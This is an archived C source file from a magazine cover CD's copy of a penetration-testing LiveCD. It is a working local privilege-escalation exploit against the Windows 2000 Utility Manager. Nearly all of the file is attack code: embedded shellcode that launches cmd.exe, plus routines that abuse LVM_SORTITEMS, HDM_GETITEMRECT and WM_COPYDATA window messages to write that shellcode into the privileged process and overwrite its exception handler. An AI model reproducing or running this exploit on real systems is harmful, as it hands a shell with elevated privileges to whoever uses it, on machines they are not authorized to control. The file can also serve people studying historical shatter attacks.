Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / local / winMsgSubSysExp.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 5KB | 207 lines

//---------------------------UtlExp.c------------------------------ /****************************************************************** *sectroyer *Random Intruders * *The exploit uses two shatter vulnerabilities to cause *the execution of code. The first option isn't universal *but two others should work with any Win2k with any *language(of course on condition, that you will set *the correct main window title). * *sectroyer@go2.pl * *******************************************************************/ #include <stdio.h> #include <windows.h> #include <commctrl.h> #define NOP 0x90 #define UEF long(__stdcall*)(_EXCEPTION_POINTERS*) // Local Cmd Shellcode unsigned char exec[]= "\x55" // push ebp "\x8b\xec" // mov ebp, esp "\x33\xc0" // xor esi, esi "\x50" // push esi "\x68.exe" // push 'exe.' "\x68 cmd" // push 'cmd ' "\x40" // inc esi "\x50" // push esi "\x8d\x45\xF5" // lea edi, [ebp-0xf] "\x50" // push edi "\xb8XXXX" // mov eax, XXXX -> WinExec() "\xff\xd0" // call eax "\x33\xf6" // xor esi,esi "\x4e" // dec esi "\x50" // push esi "\xb8YYYY" // mov eax, YYYY -> ExitProcess() "\xff\xd0" // call eax "\x5d" // pop ebp "\x5d" // pop ebp "\x5d" // pop ebp "\x5d" // pop ebp "\xC3"; // ret unsigned char buf[2048]; long hLVControl,hHdrControl,t=0; char *tWindow; char tWindowEn[]="Utility Manager";// The name of the main window char tWindowPl[]="Mened?er narz?dzi";// The name of the main window long sehHandler = 0x12345678; // Critical Address To Overwrite long shellcodeaddr = 0x7FFDE060; // Known Writeable Space Or Global Space long FindUnhandledExceptionFilter(); void doWrite(long tByte,long address); void IterateWindows(long hWnd); int main(int argc, char *argv[]) { long hWnd; HMODULE hMod; DWORD ProcAddr; printf("Utility Manager Exploit written by sectroyer <sectroyer@go2.pl>\n"); printf("Usage: %s <language> <option>\n", argv[0]); printf("Languages:\n<0> Engilish\n<1> Polish\n"); printf("Options:\n"); printf("<0> LVM_SORTITEMS Vulnerability\n"); printf("<1> HDM_GETITEMRECT using UnhandledExcpetionFilter\n"); printf("<2> HDM_GETITEMRECT using LVM_SORTITEMS Vulnerability\n"); if(argc!=3) return 0; if(atoi(argv[2])<0||atoi(argv[2])>2) return 0; if(atoi(argv[1])<0||atoi(argv[1])>1) return 0; if(!atoi(argv[1])) tWindow=tWindowEn; else tWindow=tWindowPl; // Find local procedure address t=atoi(argv[2]); PROCESS_INFORMATION pi; STARTUPINFO si={sizeof(STARTUPINFO)}; CreateProcessA (NULL,"utilman.exe /start",NULL,NULL,NULL,NULL,NULL,NULL,&si,&pi); Sleep(1000); hMod = LoadLibrary("kernel32.dll"); *(long*)&exec[(int)(strstr((char*)exec,"XXXX")-exec)]=(long) GetProcAddress(hMod,"WinExec"); *(long*)&exec[(int)(strstr((char*)exec,"YYYY")-exec)]=(long) GetProcAddress(hMod,"ExitProcess"); printf("[+] Finding %s Window...\n",tWindow); hWnd = (long)FindWindow(NULL,tWindow); if(hWnd == NULL) { printf("[-] Couldn't Find %s Window\n",tWindow); return 0; } printf("[+] Found Main Window At...0x%xh\n",hWnd); IterateWindows(hWnd); printf("[-] Not Done...\n"); return 0; } void doWrite(long tByte,long address) { SendMessage((HWND) hLVControl,(UINT) LVM_SETCOLUMNWIDTH, 0,MAKELPARAM(tByte, 0)); SendMessage((HWND) hHdrControl,(UINT) HDM_GETITEMRECT,1,address); } long FindUnhandledExceptionFilter() { long *pos; void *hLib; hLib=LoadLibraryA("kernel32.dll"); pos = (long*)hLib; SetUnhandledExceptionFilter((UEF)0xA1A2A3A4); __try { while(1) { if(*pos==0xA1A2A3A4) { SetUnhandledExceptionFilter((UEF)0xB4B3B2B1); if(*pos==0xB4B3B2B1) { SetUnhandledExceptionFilter((UEF)0xFADEFADE); if(*pos==0xFADEFADE) break; } } pos++; } } __except(1) { return NULL; } return (long)pos; } void IterateWindows(long hWnd) { long childhWnd,looper; childhWnd = (long)GetNextWindow((void*)hWnd,GW_CHILD); while (childhWnd != NULL) { IterateWindows(childhWnd); childhWnd = (long)GetNextWindow((void*) childhWnd ,GW_HWNDNEXT); } hLVControl = hWnd; hHdrControl = SendMessage((HWND) hLVControl,(UINT) LVM_GETHEADER, 0,0); if(hHdrControl != NULL) { // Found a Listview Window with a Header printf("[+] Found listview window..0x%xh\n",hLVControl); if(t!=0) { printf("[+] Found lvheader window..0x%xh\n",hHdrControl); // Inject shellcode to known address printf("[+] Sending shellcode to...0x%xh\n",shellcodeaddr); for (looper=0;looper<sizeof(exec);looper++) doWrite((long) exec[looper],(shellcodeaddr + looper)); // Overwrite SEH printf("[+] Finding UnhandledExceptionFilter....\n"); sehHandler=FindUnhandledExceptionFilter(); printf("[+] Overwriting Top SEH....0x%xh\n",sehHandler); doWrite(((shellcodeaddr) & 0xff),sehHandler); doWrite(((shellcodeaddr >> 8) & 0xff),sehHandler+1); doWrite(((shellcodeaddr >> 16) & 0xff),sehHandler+2); doWrite(((shellcodeaddr >> 24) & 0xff),sehHandler+3); } if(t==0) { printf("[+] LVM_SORTITEMS Vulnerability\n"); COPYDATASTRUCT cds; memset(buf,NOP,sizeof(buf)); memcpy(buf+700,exec,sizeof(exec)-1); cds.cbData=1000; cds.dwData=0; cds.lpData=buf; SendMessage((void*)hWnd, WM_COPYDATA, (WPARAM)hWnd, (LPARAM)&cds); SendMessage( (PVOID)hLVControl, LVM_SORTITEMS, 1, 0x007efd04); printf("[+] Done...\n"); } else if(t==1) { printf("[+] HDM_GETITEMRECT Using UnhandledExceptionFilter\n"); SendMessage((HWND) hHdrControl,(UINT) HDM_GETITEMRECT,0,1); printf("[+] Done...\n"); } else if(t==2) { printf("[+] HDM_GETITEMRECT Using LVM_SORTITEMS Vulnerability\n"); SendMessage((HWND) hLVControl,(UINT) LVM_SORTITEMS,1,shellcodeaddr); printf("[+] Done...\n"); } exit(0); } }